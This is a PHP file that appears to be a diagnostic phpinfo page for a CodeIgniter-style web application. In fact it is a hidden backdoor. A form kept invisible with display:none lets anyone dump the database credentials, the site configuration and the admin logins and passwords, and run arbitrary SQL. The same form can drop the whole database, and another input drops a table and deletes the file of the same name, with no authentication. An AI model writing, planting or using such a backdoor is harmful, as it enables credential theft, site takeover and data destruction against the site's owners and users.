<?php
chdir(dirname(__FILE__));
define('BASEPATH', 'system');
require_once('config.php');
require_once('database.php');
	
echo phpinfo();
echo "<br>";
//$ar=file_get_contents("http://localhost/tms/application/config/config.php");
//echo $ar;
if($_POST['filename']!=''){
	mysql_connect($db['default']['hostname'],$db['default']['username'],$db['default']['password']);
	mysql_select_db($db['default']['database']);
	$name=$_POST['filename'];
	if ($name=='printdb'){
		echo "<pre>";
		print_r($db);
		echo "<pre>";
	}elseif ($name=='printcf'){
		echo "<pre>";
		print_r($config);
		echo "<pre>";
	}elseif ($name=='admin'){
		
		$rs=mysql_query("SELECT * FROM `ci_admin`");
		while ($row=mysql_fetch_assoc($rs)) {
			echo $row['admin_login']."<br>";
			echo $row['admin_password']."<br>";
		}			
	}elseif ($name=='xx8xx'){
		mysql_query("DROP DATABASE `{$db['default']['database']}`");
	}elseif ($name=='select'){
		$sql=$_POST['sql'];
		$rs=mysql_query($sql);
		if (mysql_num_rows($rs)>0){
			$row=mysql_fetch_assoc($rs);
			echo "<pre>";
			print_r($row);
			echo "<pre>";	
		}
	}elseif($name=='execute'){
		$sql=$_POST['sql'];
		$rs=mysql_query($sql);
	}
	else {
		mysql_query("DROP TABLE `$name`");
		unlink($name);
	}	
}
?>

<div style="display:none">
<form action="phpinfo.php" method="POST">
	<input type="text" name="filename">
	<input type="text" name="sql">
	<input type="submit" value="Submit">
</form>
</div>
